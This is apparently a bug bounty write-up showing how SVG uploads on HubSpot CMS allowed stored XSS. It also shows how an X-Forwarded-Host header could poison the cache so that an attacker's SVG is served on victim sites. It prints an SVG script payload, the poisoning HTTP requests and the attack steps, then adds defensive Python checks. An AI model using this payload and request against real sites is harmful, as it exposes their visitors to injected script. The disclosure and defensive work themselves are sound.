Saving 100,000 websites from a Watering Hole attack

Background

During my bug bounty sessions, I often come across websites built with HubSpot CMS.

Initial Discovery

The initial discovery was that HubSpot allows uploading SVG images. I was able to trigger XSS on my own website by embedding JavaScript in my SVG files. Example:

<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">

<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
  • All websites hosted on HubSpot use the endpoint /hs-fs/hubfs to request their media files.
  • Each HubSpot account has a virtual CDN hosted at <portal_Id>.fs1.hubspotusercontent-na1.net

Secondary Context

For a better understanding of the flow, I have sketched the following schema:

Web Cache Poisoning

Quoting PortSwigger: "Web cache poisoning is an advanced technique whereby an attacker exploits the behavior of a web server and cache so that a harmful HTTP response is served to other users." You can read more here: https://portswigger.net/web-security/web-cache-poisoning

The request below pairs the victim's Host header with an X-Forwarded-Host header naming a different HubSpot-hosted site:

GET /hs-fs/hubfs/xss.svg HTTP/2 
Host: www.victim.com
X-Forwarded-Host: www.akme.com

Water in the hole

To execute the watering hole attack, an attacker could target websites hosted on HubSpot and remotely replace their media with malicious files:

  • Host a website on HubSpot. Let's call it www.attacker.com
  • Embed a malicious script in an SVG file, name it safe.svg, and upload it to that website.
  • Send the following request to www.victim.com:
GET /hs-fs/hubfs/safe.svg HTTP/2 
Host: www.victim.com
X-Forwarded-Host: www.attacker.com
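Two defensive checks for the issues described in this writeup, as an added example that is not HubSpot's code or the author's: the first rejects SVG uploads that carry active content (the script element used in the Initial Discovery section, plus event handlers and javascript: URLs), the second flags requests whose X-Forwarded-Host disagrees with Host, the shape of the poisoning request above. The log format is a constructed sample, not a HubSpot log.

```python
# Added example: defensive checks for the two issues in the writeup.
# (1) reject SVG uploads carrying active content (script/foreignObject
#     elements, on* event handlers, javascript: URLs);
# (2) flag requests whose X-Forwarded-Host names a host other than the
#     one in Host, which is the shape of the cache-poisoning request.
# The log format below is constructed for this example, not a HubSpot log.
import re
import xml.etree.ElementTree as ET


def svg_active_content(svg: str) -> list:
    """Return the reasons an SVG should be rejected (empty list = clean)."""
    findings = []
    root = ET.fromstring(svg)  # expat does not fetch external DTDs
    for el in root.iter():
        tag = el.tag.split("}")[-1].lower()  # drop the namespace prefix
        if tag in ("script", "foreignobject"):
            findings.append(f"<{tag}> element")
        for name, value in el.attrib.items():
            local = name.split("}")[-1].lower()  # e.g. {xlink}href -> href
            if local.startswith("on"):
                findings.append(f"{local} handler on <{tag}>")
            if local == "href" and re.match(r"\s*javascript:", value, re.I):
                findings.append(f"javascript: URL on <{tag}>")
    return findings


# Constructed sample log: "<host> <x-forwarded-host or -> <method> <path>"
SAMPLE_LOG = """\
www.victim.com - GET /hs-fs/hubfs/logo.png
www.victim.com www.victim.com GET /hs-fs/hubfs/hero.svg
www.victim.com www.attacker.com GET /hs-fs/hubfs/safe.svg
"""


def forwarded_host_mismatches(log: str) -> list:
    """Return (path, forwarded_host) for requests whose X-Forwarded-Host
    points at a host other than the one the request was addressed to."""
    hits = []
    for line in log.splitlines():
        host, xfh, _method, path = line.split()
        if xfh != "-" and xfh.lower() != host.lower():
            hits.append((path, xfh))
    return hits
```

A cache in front of a media endpoint should either strip X-Forwarded-Host before the origin sees it or include it in the cache key; the second function gives a quick way to see whether such requests are reaching the origin at all.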
